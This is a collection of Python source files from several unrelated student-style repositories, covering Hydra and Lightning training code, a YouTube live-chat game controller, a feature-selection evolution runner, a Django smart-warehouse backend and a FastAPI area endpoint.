# filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(epoch).rjust(5, '0')}_" \
# f"{str(batch).rjust(5, '0')}.png")
real_image, _ = self.encoder.generate_real_face_samples(start_n, 1, dataset_path="dataset_download/thumbnails128x128")
decoded_real_image = self.model.predict(real_image)
decoded_input_image = self.model.predict(input_image)
fig = plt.imshow(decoded_real_image[0], interpolation='nearest')
if disable_plot == False:
plt.show(fig)
plt.close()
fig = plt.imshow(decoded_input_image[0], interpolation='nearest')
if disable_plot == False:
plt.show(fig)
plt.close()
start_n += batch_size
``` |
{
"source": "2021L-ZZSN/template",
"score": 2
} |
#### File: zzsn2021/configs/register.py
```python
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Any, Dict, Iterator, List, Optional, cast
import omegaconf
from hydra.conf import HydraConf, RunDir, SweepDir
from hydra.core.config_store import ConfigStore
from omegaconf import SI, DictConfig
from omegaconf.dictconfig import DictConfig
from omegaconf.omegaconf import MISSING
# isort: split
from .experiment import ExperimentSettings
from .lightning import LightningSettings
from .optim import OPTIMIZERS, SCHEDULERS, OptimSettings
@dataclass
class Hydra(HydraConf):
run: RunDir = RunDir("${output_dir}")
sweep: SweepDir = SweepDir(".", "${output_dir}")
@dataclass
class Config():
"""
Top-level Hydra config class.
"""
defaults: List[Any] = field(default_factory=lambda: [
{'experiment': 'fashion'},
{'optim': 'adam'},
{'override hydra/job_logging': 'rich'},
{'override hydra/hydra_logging': 'rich'},
])
# Path settings
data_dir: str = SI("${oc.env:DATA_DIR}")
output_dir: str = SI("${oc.env:RUN_DIR}")
# Runtime configuration
hydra: Hydra = Hydra()
pl: LightningSettings = LightningSettings()
# Experiment settings --> experiment/*.yaml
experiment: ExperimentSettings = MISSING
# Optimizer & scheduler settings --> optim/*.yaml
optim: OptimSettings = MISSING
# wandb metadata
notes: Optional[str] = None
tags: Optional[List[str]] = None
def register_configs():
"""
Register configuration options in the main ConfigStore.instance().
The term `config` is used for a StructuredConfig at the root level (normally switchable with `-cn`
flag in Hydra, here we use only one default config). Fields of the main config use StructuredConfigs
with class names ending in `Settings`. `Conf` suffix is used for external schemas provided by
the `hydra-torch` package for PyTorch/PyTorch Lightning integration, e.g. `AdamConf`.
"""
cs = ConfigStore.instance()
# Main config
cs.store(name='default', node=DictConfig(Config()))
# Config groups with defaults, YAML files validated by Python structured configs
# e.g.: `python -m zzsn2021.main experiment=fashion`
cs.store(group='experiment', name='schema_experiment', node=ExperimentSettings)
cs.store(group='optim', name='schema_optim', node=OptimSettings)
# Specific schemas, YAML files should inherit them as a default, e.g:
# defaults:
# - schema_optim
# - schema_optim_adam
for key, node in OPTIMIZERS.items():
name = f'schema_optim_{key}'
cs.store(group='optim', name=name, node=node, package='optim.optimizer')
for key, node in SCHEDULERS.items():
name = f'schema_optim_lrscheduler_{key}'
cs.store(group='optim', name=name, node=node, package='optim.scheduler')
def _get_tags(cfg: dict[str, Any]) -> Iterator[str]:
for key, value in cfg.items():
if isinstance(value, dict):
yield from _get_tags(cast(Dict[str, Any], value))
if key == '_tags_':
if isinstance(value, list):
for v in cast(List[str], value):
yield v
else:
if value is not None:
value = cast(str, value)
yield value
def get_tags(cfg: DictConfig):
"""
Extract all tags from a nested DictConfig object.
"""
cfg_dict = cast(Dict[str, Any], omegaconf.OmegaConf.to_container(cfg, resolve=True))
if 'tags' in cfg_dict:
cfg_dict['_tags_'] = cfg_dict['tags']
return list(_get_tags(cfg_dict))
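if __name__ == '__main__':
    # Quick illustration with made-up values: every `_tags_` entry found in a nested
    # config dict is flattened into one list of tag strings.
    example = {'experiment': {'_tags_': ['mnist', 'baseline']}, 'optim': {'_tags_': 'adam'}}
    print(list(_get_tags(example)))  # ['mnist', 'baseline', 'adam']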
```
#### File: zzsn2021/systems/classifier.py
```python
from __future__ import annotations
import random
from typing import Any, List, Tuple, Union
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn as nn
import torch.nn.functional as F
from hydra.utils import instantiate
from pytorch_lightning.loggers.base import LoggerCollection
from pytorch_lightning.loggers.wandb import WandbLogger
from pytorch_lightning.metrics import Accuracy
from rich import print
from torch.optim.lr_scheduler import _LRScheduler
from torch.optim.optimizer import Optimizer
from wandb.sdk.wandb_run import Run
from ..configs import Config
from ..models import ConvNet
class ImageClassifier(pl.LightningModule):
"""
Basic image classifier.
"""
def __init__(self, cfg: Config) -> None:
super().__init__() # type: ignore
self.logger: Union[LoggerCollection, WandbLogger, Any]
self.wandb: Run
self.cfg = cfg
self.model = ConvNet(self.cfg)
self.criterion = nn.CrossEntropyLoss()
# Metrics
self.train_acc = Accuracy()
self.val_acc = Accuracy()
# -----------------------------------------------------------------------------------------------
# Default PyTorch Lightning hooks
# -----------------------------------------------------------------------------------------------
def on_fit_start(self) -> None:
"""
Hook before `trainer.fit()`.
Attaches current wandb run to `self.wandb`.
"""
if isinstance(self.logger, LoggerCollection):
for logger in self.logger: # type: ignore
if isinstance(logger, WandbLogger):
self.wandb = logger.experiment # type: ignore
elif isinstance(self.logger, WandbLogger):
self.wandb = self.logger.experiment # type: ignore
def on_save_checkpoint(self, checkpoint: dict[str, Any]) -> None:
"""
Hook on checkpoint saving.
Adds config and RNG states to the checkpoint file.
"""
checkpoint['cfg'] = self.cfg
checkpoint['rng_torch'] = torch.default_generator.get_state()
checkpoint['rng_numpy'] = np.random.get_state()
checkpoint['rng_random'] = random.getstate()
def on_load_checkpoint(self, checkpoint: dict[str, Any]) -> None:
"""
Hook on checkpoint loading.
Loads RNG states from the checkpoint file.
"""
torch.default_generator.set_state(checkpoint['rng_torch'])
np.random.set_state(checkpoint['rng_numpy'])
random.setstate(checkpoint['rng_random'])
# ----------------------------------------------------------------------------------------------
# Optimizers
# ----------------------------------------------------------------------------------------------
def configure_optimizers(self) -> Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]]: # type: ignore
"""
Define system optimization procedure.
See https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers.
Returns
-------
Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]]
Single optimizer or a combination of optimizers with learning rate schedulers.
"""
optimizer: Optimizer = instantiate(
self.cfg.optim.optimizer,
params=self.parameters(),
_convert_='all'
)
if self.cfg.optim.scheduler is not None:
scheduler: _LRScheduler = instantiate( # type: ignore
self.cfg.optim.scheduler,
optimizer=optimizer,
_convert_='all'
)
print(optimizer, scheduler)
return [optimizer], [scheduler]
else:
print(optimizer)
return optimizer
# ----------------------------------------------------------------------------------------------
# Forward
# ----------------------------------------------------------------------------------------------
def forward(self, x: torch.Tensor) -> torch.Tensor: # type: ignore
"""
Forward pass of the whole system.
In this simple case just calls the main model.
Parameters
----------
x : torch.Tensor
Input tensor.
Returns
-------
torch.Tensor
Output tensor.
"""
return self.model(x)
# ----------------------------------------------------------------------------------------------
# Loss
# ----------------------------------------------------------------------------------------------
def calculate_loss(self, outputs: torch.Tensor, targets: torch.Tensor) -> torch.Tensor:
"""
Compute loss value of a batch.
In this simple case just forwards computation to default `self.criterion`.
Parameters
----------
outputs : torch.Tensor
Network outputs with shape (batch_size, n_classes).
targets : torch.Tensor
Targets (ground-truth labels) with shape (batch_size).
Returns
-------
torch.Tensor
Loss value.
"""
return self.criterion(outputs, targets)
# ----------------------------------------------------------------------------------------------
# Training
# ----------------------------------------------------------------------------------------------
def training_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, torch.Tensor]: # type: ignore
"""
Train on a single batch with loss defined by `self.criterion`.
Parameters
----------
batch : list[torch.Tensor]
Training batch.
batch_idx : int
Batch index.
Returns
-------
dict[str, torch.Tensor]
Metric values for a given batch.
"""
inputs, targets = batch
outputs = self(inputs) # basically equivalent to self.forward(data)
loss = self.calculate_loss(outputs, targets)
self.train_acc(F.softmax(outputs, dim=1), targets)
return {
'loss': loss,
# no need to return 'train_acc' here since it is always available as `self.train_acc`
}
def training_epoch_end(self, outputs: list[Any]) -> None:
"""
Log training metrics.
Parameters
----------
outputs : list[Any]
List of dictionaries returned by `self.training_step` with batch metrics.
"""
step = self.current_epoch + 1
metrics = {
'epoch': float(step),
'train_acc': float(self.train_acc.compute().item()),
}
# Average additional metrics over all batches
for key in outputs[0]:
metrics[key] = float(self._reduce(outputs, key).item())
self.logger.log_metrics(metrics, step=step)
def _reduce(self, outputs: list[Any], key: str):
return torch.stack([out[key] for out in outputs]).mean().detach()
# ----------------------------------------------------------------------------------------------
# Validation
# ----------------------------------------------------------------------------------------------
def validation_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, Any]: # type: ignore
"""
Compute validation metrics.
Parameters
----------
batch : list[torch.Tensor]
Validation batch.
batch_idx : int
Batch index.
Returns
-------
dict[str, torch.Tensor]
Metric values for a given batch.
"""
inputs, targets = batch
outputs = self(inputs) # basically equivalent to self.forward(data)
self.val_acc(F.softmax(outputs, dim=1), targets)
return {
# 'additional_metric': ...
# no need to return 'val_acc' here since it is always available as `self.val_acc`
}
def validation_epoch_end(self, outputs: list[Any]) -> None:
"""
Log validation metrics.
Parameters
----------
outputs : list[Any]
List of dictionaries returned by `self.validation_step` with batch metrics.
"""
step = self.current_epoch + 1 if not self.trainer.running_sanity_check else self.current_epoch # type: ignore
metrics = {
'epoch': float(step),
'val_acc': float(self.val_acc.compute().item()),
}
# Average additional metrics over all batches
for key in outputs[0]:
metrics[key] = float(self._reduce(outputs, key).item())
self.logger.log_metrics(metrics, step=step)
``` |
{
"source": "2021myj-j/share-game",
"score": 3
} |
#### File: share_game/core/confing.py
```python
import yaml
import os
from core.utils import find_files
class ReadConfing():
def __init__(self, path: str) -> None:
self.data = yaml.load(open(path, "r", encoding="UTF-8"), Loader=yaml.FullLoader)
def getconfing(self, ver_name: str):
return self.data[ver_name]
def find_confing_path(confing_paths: list):
if confing_paths:
if len(confing_paths) > 1:
for i in confing_paths:
if "share" in i and "game" in i:
return i
else:
return confing_paths[0]
confing_paths = find_files(os.path.abspath(".."), "confing.yaml")
if not confing_paths:
confing_paths = find_files(os.path.abspath(".."), "key.yaml")
confing_path = find_confing_path(confing_paths)
if not confing_path:
class MissingKeyOrConfingError(Exception):
def __str__(self) -> str:
return "Missing key file or confing file"
raise MissingKeyOrConfingError
readConfing = ReadConfing(confing_path)
YOTUBER_URL = readConfing.getconfing("YOTUBER_URL")
YOTUBER_API_KEY = readConfing.getconfing("YOTUBER_API_KEY")
if __name__ == "__main__":
print(confing_path)
print(YOTUBER_URL)
print(YOTUBER_API_KEY)
# old version of the find_confing_path() function
"""
def find_confing_path():
import os
def fing_confing(listdir, path: str):
if "confing.yaml" in listdir:
return os.path.join(path, "confing.yaml")
elif "key.yaml" in listdir:
return os.path.join(path, "key.yaml")
listdir = os.listdir(".")
abspath: str = os.path.abspath(".")
confing_path = None
if "share_game" in listdir:
listdir_share_game = os.listdir("share_game")
confing_path = fing_confing(
listdir_share_game, os.path.join(abspath, "share_game")
)
elif "share-game" in listdir:
listdir_share_game = os.listdir("share-game")
confing_path = fing_confing(
listdir_share_game, os.path.join(abspath, "share-game")
)
if not confing_path:
confing_path = fing_confing(listdir, abspath)
if confing_path:
return confing_path
else:
class MissingKeyOrConfingError(Exception):
def __str__(self) -> str:
return "Missing key file or confing file"
raise MissingKeyOrConfingError
"""
```
#### File: share_game/core/youtube_api.py
```python
import requests
import datetime
class YoutubeLiveChat():
def __init__(self, youtuber_url, youtuber_api_key, interval=10) -> None:
"""
Unit of interval: second
"""
self.youtuber_api_key = youtuber_api_key
self.chat_id = self.get_chat_id(youtuber_url)
if not self.chat_id:
class NoneError(Exception):
def __str__(self) -> str:
return "This value can NOT be None!"
raise NoneError
self.interval = interval
self.previous_token_time = datetime.datetime.now() - datetime.timedelta(seconds=self.interval + 1) # yapf: disable
self.page_token = self.get_chat_message_next_page_token()
def get_chat_id(self, yt_url: str):
'''
from qiita @iroiro_bot
https://qiita.com/iroiro_bot/items/ad0f3901a2336fe48e8f
https://developers.google.com/youtube/v3/docs/videos/list?hl=ja
'''
video_id = yt_url.replace('https://www.youtube.com/watch?v=', '')
print('video_id : ', video_id)
url = 'https://www.googleapis.com/youtube/v3/videos'
params = {
'key': self.youtuber_api_key,
'id': video_id,
'part': 'liveStreamingDetails'
}
data = requests.get(url, params=params).json()
try:
liveStreamingDetails = data['items'][0]['liveStreamingDetails']
except BaseException:
print('NO live')
return None
if 'activeLiveChatId' in liveStreamingDetails.keys():
chat_id = liveStreamingDetails['activeLiveChatId']
print('get_chat_id done!')
else:
chat_id = None
print('NOT live')
return chat_id
def get_chat_message_row_data(self, page_token=None, part='id,snippet,authorDetails'):
        # taking this as an input would probably be easier to work with
interval = datetime.datetime.now() - self.previous_token_time
if interval.seconds < self.interval:
return None
# print(self.interval)
url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
params = {
'key': self.youtuber_api_key,
'liveChatId': self.chat_id,
'part': 'id,snippet,authorDetails',
}
if page_token:
params['pageToken'] = page_token
self.previous_token_time = datetime.datetime.now()
res = requests.get(url, params=params).json()
# print(res)
if "error" in res:
return None
return res
def get_chat_message_next_page_token(self):
chat_message_row_data = self.get_chat_message_row_data()
if not chat_message_row_data:
return None
return chat_message_row_data["nextPageToken"]
def format_chat_message_row_data(self, data):
if not data:
return None
comments = []
try:
for item in data['items']:
channelId = item['snippet']['authorChannelId']
msg = item['snippet']['displayMessage']
published_at = item['snippet']["publishedAt"]
usr = item['authorDetails']['displayName']
                # the requested fields
comment = {
"author_channel_id": channelId,
"author_name": usr,
"display_message": msg,
"published_at": published_at
}
comments.append(comment)
except BaseException:
return None
res = {"next_page_token": data['nextPageToken'], "comments": comments}
return res
# yapf: disable
def get_formatted_chat_message_data(self, page_token=None, part='id,snippet,authorDetails'):
chat_message_row_data = self.get_chat_message_row_data(page_token=page_token, part=part)
formatted_chat_message_data = self.format_chat_message_row_data(chat_message_row_data)
return formatted_chat_message_data
# yapf: enable
def get_next_chat_message(self, part='id,snippet,authorDetails'):
if not self.page_token:
self.page_token = self.get_chat_message_next_page_token()
next_chat_message = self.get_formatted_chat_message_data(page_token=self.page_token, part=part) # yapf: disable
if not next_chat_message:
return
self.page_token = next_chat_message["next_page_token"]
return next_chat_message
if __name__ == '__main__':
import time
import confing
print("\n\n\n\n\n")
youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY)
# print(youtube_live_chat.get_chat_id(confing.YOTUBER_URL))
print(youtube_live_chat.get_next_chat_message())
time.sleep(5)
print(youtube_live_chat.get_next_chat_message())
time.sleep(6)
print(youtube_live_chat.get_next_chat_message())
# yt_url = input('Input YouTube URL > ')
# chat_id = get_chat_id(yt_url)
# chat_id = get_chat_id(confing.YOTUBER_URL)
# url = 'https://www.googleapis.com/youtube/v3/liveChat/messages'
# params = {
# 'key': confing.YOTUBER_API_KEY,
# 'liveChatId': chat_id,
# 'part': 'id,snippet,authorDetails'
# }
# pageToken = None
# if type(pageToken) == str:
# params['pageToken'] = pageToken
# data = requests.get(url, params=params).json()
# print(data)
"""
chat_id = get_chat_id(confing.YOTUBER_URL)
data = get_chat_message(confing.YOTUBER_API_KEY, chat_id)
format_data = format_row_yotube_data(data)
print(format_data)
"""
# data = [
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# },
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# },
# {
# "author_channel_id": "5555",
# "author_name": "sei",
# "display_message": "楽しい!!!!!"
# }
# ]
```
#### File: share-game/share_game/main.py
```python
from typing import List, Tuple, Optional
import datetime
from game.game import App
from core import confing
from core.youtube_api import YoutubeLiveChat
from core.utils import ChatToCommand
class App(App):
def __init__(self, debug_mode=False):
self.frame_counter = 0
"""
command_list_per_s: List[Tuple[bool , bool , bool ]]
command_list_per_s: List[Tuple[a_pressed, b_pressed, y_pressed]]
"""
self.command_list: Optional[List[Tuple[bool, bool, bool]]] = []
# self.command_list = [(False, True) for i in range(3)]
self.youtube_live_chat = YoutubeLiveChat(
confing.YOTUBER_URL, confing.YOTUBER_API_KEY, interval=1
)
self.chat_to_command = ChatToCommand()
self.previous_token_time = datetime.datetime.now()
super().__init__(debug_mode)
def update(self):
self.frame_counter = self.frame_counter % 30
self.frame_counter += 1
self.get_command()
self.input_command(1)
super().update()
def input_command(self, step=1):
if step < 1 or step > 30:
class OutStepRange(Exception):
def __str__(self) -> str:
return "out of step randge. The range of steps is 1-30."
raise OutStepRange
if self.frame_counter % step == step - 1 and self.command_list:
self.player.a_pressed, self.player.d_pressed, self.player.y_pressed = self.command_list.pop(0) # yapf: disable
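    # Pacing note (illustrative): update() runs once per frame, so input_command(step=1)
    # consumes a queued viewer command every frame, while step=30 consumes roughly one
    # command per second, assuming the game loop runs at about 30 FPS (frame_counter
    # wraps at 30). For example, self.input_command(step=15) would apply at most
    # about two viewer commands per second.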
def get_command(self):
def count_interval():
interval = datetime.datetime.now() - self.previous_token_time
self.previous_token_time = datetime.datetime.now()
return interval
next_chat_message = self.youtube_live_chat.get_next_chat_message()
if not next_chat_message or (len(next_chat_message["comments"]) == 0):
if next_chat_message:
print("---empty! %d s passed since last token---" % count_interval().seconds)
return
is_y_pressed = False
if self.chat_to_command.data_set_to_num_of_command(next_chat_message)["y"] > 0:
is_y_pressed = True
if is_y_pressed:
self.command_list.append(self.chat_to_command.str_to_command("y"))
num_of_command_list = self.chat_to_command.data_to_num_of_command(next_chat_message) # yapf: disable
for i in num_of_command_list:
if i["vec2"] > 0:
for j in range(i["vec2"]):
self.command_list.append(self.chat_to_command.str_to_command("a"))
elif i["vec2"] < 0:
for j in range(-i["vec2"]):
self.command_list.append(self.chat_to_command.str_to_command("d"))
print("---message follows, %d s passed since last token---" % count_interval().seconds)
for i in next_chat_message["comments"]:
display_message = i["display_message"]
print(display_message)
# first_valid_command = self.chat_to_command.first_valid_command_str_to_command(display_message) # yapf: disable
# if first_valid_command:
# self.command_list.append(first_valid_command)
if __name__ == "__main__":
# youtube_live_chat = YoutubeLiveChat(confing.YOTUBER_URL, confing.YOTUBER_API_KEY)
App()
``` |
{
"source": "2021rahul/Feature_Subset_Selection_Genetic_Algorithm",
"score": 3
} |
#### File: Feature_Subset_Selection_Genetic_Algorithm/PYTHON_CODE/main.py
```python
import config
import quantum_diff_evol
def elitist_quantum_diff_evol():
print("Initializing population")
pop_qubits = quantum_diff_evol.pop_init()
print("Observing population")
pop_obs_qubits = quantum_diff_evol.pop_observe(pop_qubits)
print("Calculating Initial Accuracy")
qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits)
for iter in range(0, config.EQDE_MAXITER):
print("QDE iteration start")
print("Iteration Number: ", iter)
print("Calculating Original Accuracy")
qubits_accuracy, qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_qubits)
print("Mutating Population")
pop_mut_qubits = quantum_diff_evol.pop_mutation(pop_qubits)
print("Population crossover")
pop_cross_qubits = quantum_diff_evol.pop_crossover(pop_qubits, pop_mut_qubits, qubits_accuracy)
pop_obs_cross_qubits = quantum_diff_evol.pop_observe(pop_cross_qubits)
print("Calculating Crossover Accuracy")
cross_qubits_accuracy, cross_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(pop_obs_cross_qubits)
print("Population Selection")
pop_qubits, pop_obs_qubits = quantum_diff_evol.pop_selection(pop_qubits, pop_obs_qubits, qubits_accuracy, pop_cross_qubits, pop_obs_cross_qubits, cross_qubits_accuracy)
final_pop_qubits = pop_qubits
final_pop_obs_qubits = pop_obs_qubits
print("Calculating Final Accuracy")
final_qubtis_accuracy, final_qubits_cross_val_score = quantum_diff_evol.pop_accuracy(final_pop_obs_qubits)
quantum_diff_evol.print_output(final_pop_qubits, final_pop_obs_qubits, final_qubits_cross_val_score)
if __name__ == "__main__":
elitist_quantum_diff_evol()
``` |
{
"source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Cloud",
"score": 2
} |
#### File: warehouse_cloud/cloud/views.py
```python
from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('cloud/index.html')
return HttpResponse(template.render())
def data(request):
template = loader.get_template('cloud/data.html')
return HttpResponse(template.render())
def experiment(request):
template = loader.get_template('cloud/experiment.html')
return HttpResponse(template.render())
```
#### File: warehouse_cloud/cloud/warehouse.py
```python
from . import rl
from .models import Inventory, Order
class Warehouse:
def __init__(self, anomaly_aware):
# config
self.cap_conveyor = 5
self.cap_wait = 5
self.reward_order = 30
self.reward_trash = 70
self.reward_wait = 1
self.order_total = 20
self.order_delay = 0
self.anomaly_mtbf = 5
self.anomaly_duration = 10
self.anomaly_wait = 3
self.item_buy = 5
# Warehouse
self.tick = 0
self.anomaly_aware = anomaly_aware
try:
self.rl_model = rl.DQN(path='../model/rl.pth')
self.a_rl_models = [rl.DQN(path='../model/a_rl_0.pth'),
None,
rl.DQN(path='../model/a_rl_2.pth')]
except:
pass
self.c = [0] * 4
self.recent_c = 0
self.recent_s = 0
self.c_waiting = 0
self.c_allow = 3
self.r_allow = [False] * 3
self.s_allow = 3
self.r_wait = [0] * 3
self.s_wait = 0
self.stuck = [False] * 3
self.count = [0] * 3
self.current_anomaly = [-1] * 3
self.reward = 0
self.old_state = None
self.old_decision = None
self.old_reward = 0
def need_decision(self):
if sum(self.c) == 0:
return False
num_true = 0
for ans in self.available():
if ans:
num_true += 1
return num_true > 1
def available(self, i=None):
if i is not None:
inventory_objects = Inventory.objects.filter(stored=i)
ans = len(inventory_objects) < self.cap_conveyor
if not self.anomaly_aware:
return ans
return ans and self.current_anomaly[i] == -1
ans = []
for i in range(3):
inventory_objects = Inventory.objects.filter(stored=i)
single_ans = len(inventory_objects) < self.cap_conveyor
if not self.anomaly_aware:
ans.append(single_ans)
else:
ans.append(single_ans and self.current_anomaly[i] == -1)
return ans
def get_available(self):
available = self.available()
ans = []
for i, avail in enumerate(available):
if avail:
ans.append(i)
return ans
def get_inventory(self, item):
return self.c[item - 1] + len(Inventory.objects.filter(item_type=item, stored__lt=4))
def get_order(self, is_sum=True):
if is_sum:
return len(Order.objects.all())
orders = []
for i in range(4):
orders.append(len(Order.objects.filter(item_type=i + 1)))
return orders
def get_state(self):
def repr_list(conveyor):
ans = 0
for i, item in enumerate(conveyor):
ans += item.item_type * (5 ** (5 - i - 1))
return ans
ans = [self.tick, self.recent_c]
for i in range(4):
ans.append(repr_list(Inventory.objects.filter(stored=i)))
ans.extend(self.get_order(False))
return ans
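    # Worked example for repr_list above (illustrative): a conveyor holding items with
    # types [2, 4] (capacity 5) is packed into the base-5 number
    # 2 * 5**4 + 4 * 5**3 = 1250 + 500 = 1750, so each conveyor fits in one state scalar.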
def anomaly_state(self):
anomaly_number = 0
for i, anomaly in enumerate(self.current_anomaly):
if anomaly != -1:
anomaly_number += (2 ** i)
return anomaly_number
``` |
{
"source": "2021-SE-Lab-Mindstorm-Project/Smart-Warehouse-Repository-Edge",
"score": 2
} |
#### File: edge_repository/edge/api.py
```python
import datetime
import json
import requests
from drf_yasg.utils import swagger_auto_schema
from rest_framework import serializers, viewsets
from rest_framework.response import Response
from edge_repository.settings import settings
from . import models
from .models import Sensory, Inventory, Order, Message, Status
experiment_type = 'SAS'
shipment_capacity = 0
# Serializer
class SensoryListSerializer(serializers.ListSerializer):
def create(self, validated_data):
sensory_data_list = [Sensory(**item) for item in validated_data]
return Sensory.objects.bulk_create(sensory_data_list)
class SensorySerializer(serializers.ModelSerializer):
class Meta:
model = Sensory
fields = '__all__'
list_serializer_class = SensoryListSerializer
class MessageSerializer(serializers.ModelSerializer):
class Meta:
model = Message
fields = '__all__'
# Sensory Data
class SensoryViewSet(viewsets.ModelViewSet):
queryset = Sensory.objects.all()
serializer_class = SensorySerializer
http_method_names = ['post']
@swagger_auto_schema(responses={400: "Bad Request"})
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data, many=isinstance(request.data, list))
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, headers=headers)
class MessageViewSet(viewsets.ModelViewSet):
queryset = Message.objects.all()
serializer_class = MessageSerializer
http_method_names = ['post']
@swagger_auto_schema(responses={400: "Bad request", 204: "Invalid Message Title / Invalid Message Sender / Not allowed"})
def create(self, request, *args, **kwargs):
global shipment_capacity, experiment_type
super().create(request, *args, **kwargs)
sender = int(request.data['sender'])
title = request.data['title']
if sender == models.MACHINE_REPOSITORY_1 or sender == models.MACHINE_REPOSITORY_2 or sender == models.MACHINE_REPOSITORY_3:
if title == 'Running Check':
if len(Status.objects.all()) == 0:
return Response("Not allowed", status=204)
current_status = Status.objects.all()[0]
if current_status.status:
return Response(status=201)
return Response("Not allowed", status=204)
if title == 'Sending Check':
stored = sender - models.MACHINE_REPOSITORY_1
if experiment_type == 'SAS':
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'SAS Check',
'msg': stored}
response = requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
if response.status_code == 204:
return Response("Not allowed", status=204)
shipment_capacity += 1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Order Processed',
'msg': stored}
requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message)
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
first_item = Inventory.objects.filter(stored=stored)[0]
target_orders = Order.objects.filter(item_type=first_item.item_type).order_by('made')
if shipment_capacity < settings['max_capacity_shipment']:
if len(target_orders) == 0:
return Response("Not allowed", status=204)
else:
target_order = target_orders[0]
target_order.delete()
shipment_capacity += 1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Order Processed',
'msg': stored}
requests.post(settings['edge_classification_address'] + '/api/message/', data=process_message)
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
return Response("Not allowed", status=204)
if title == 'Anomaly Occurred':
location = sender - models.MACHINE_REPOSITORY_1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Anomaly Occurred',
'msg': location}
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
if title == 'Anomaly Solved':
location = sender - models.MACHINE_REPOSITORY_1
process_message = {'sender': models.EDGE_REPOSITORY,
'title': 'Anomaly Solved',
'msg': location}
requests.post(settings['cloud_address'] + '/api/message/', data=process_message)
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.EDGE_CLASSIFICATION:
if title == 'Classification Processed':
msg = json.loads(request.data['msg'])
item_type = int(msg['item_type'])
stored = int(msg['stored'])
# Modify Inventory DB
target_item = Inventory(item_type=item_type, stored=stored)
target_item.save()
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.EDGE_SHIPMENT:
if title == 'Order Processed':
shipment_capacity -= 1
return Response(status=201)
return Response("Invalid Message Title", status=204)
if sender == models.CLOUD:
if title == 'Order Created':
order_data = json.loads(request.data['msg'])
new_order = Order(item_type=int(order_data['item_type']), made=order_data['made'])
new_order.save()
return Response(status=201)
if title == 'Start':
experiment_type = request.data['msg']
Inventory.objects.all().delete()
Order.objects.all().delete()
shipment_capacity = 0
if len(Status.objects.all()) == 0:
current_state = Status()
else:
current_state = Status.objects.all()[0]
current_state.status = True
current_state.save()
return Response(status=201)
if title == 'Stop':
if len(Status.objects.all()) == 0:
current_state = Status()
else:
current_state = Status.objects.all()[0]
current_state.status = False
current_state.save()
return Response(status=201)
return Response("Invalid Message Title", status=204)
return Response("Invalid Message Sender", status=204)
``` |
{
"source": "2021-SW-Project-contest/sw-sangcharim-be",
"score": 3
} |
#### File: sw-sangcharim-be/api/database.py
```python
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
# SQLALCHEMY_DATABASE_URL = "mariadb+mariadbconnector://{username}:{password}@{host}:{port}/{db_name}".format(
# host=os.getenv('DB_SCR_HOST'),
# username=os.getenv('DB_SCR_USERNAME'),
# password=<PASSWORD>('<PASSWORD>'),
# port=os.getenv('DB_SCR_PORT'),
# db_name=os.getenv('DB_SCR_DATABASE')
# )
SQLALCHEMY_DATABASE_URL = "postgresql://{username}:{password}@{host}:{port}/{db_name}".format(
host=os.getenv('DB_SCR_HOST'),
username=os.getenv('DB_SCR_USERNAME'),
password=<PASSWORD>('<PASSWORD>'),
port=os.getenv('DB_SCR_PORT'),
db_name=os.getenv('DB_SCR_DATABASE')
)
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False)
Base = declarative_base()
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
```
#### File: api/routers/area_ro.py
```python
from typing import List
from fastapi import APIRouter, Depends
from sqlalchemy.orm import Session
from api import models
from api.schemas import area_sc
from api import database
router = APIRouter(
prefix="/area",
tags=["Area"],
responses={404: {"description": "Not found"}},
)
get_db = database.get_db
@router.get("", response_model=List[area_sc.AreaSchema])
def getArea(db: Session=Depends(get_db)):
"""
    `Done`\n
    `areaCategory` : top-level commercial district category\n
    `areaList` : list of commercial districts within that category\n
    `areaCode` : detailed district code\n
    `areaName` : detailed district name\n
"""
areaList = db.query(models.Area).all()
areaCategoryList: list[str] = list(set([area.areaCategory for area in areaList]))
result: list[area_sc.AreaSchema] = [area_sc.AreaSchema(areaCategory=areaCategory, areaList=[]) for areaCategory in areaCategoryList]
for area in areaList:
index = areaCategoryList.index(area.areaCategory)
result[index].areaList.append(area_sc.Area(
areaCode=area.areaCode,
areaName=area.areaName,
))
return result
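# Illustrative sketch added by the editor (not part of the original source): a GET /area
# response would look roughly like this, assuming two districts share one category:
# [
#   {"areaCategory": "...", "areaList": [
#       {"areaCode": 1, "areaName": "..."},
#       {"areaCode": 2, "areaName": "..."}
#   ]}
# ]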
```
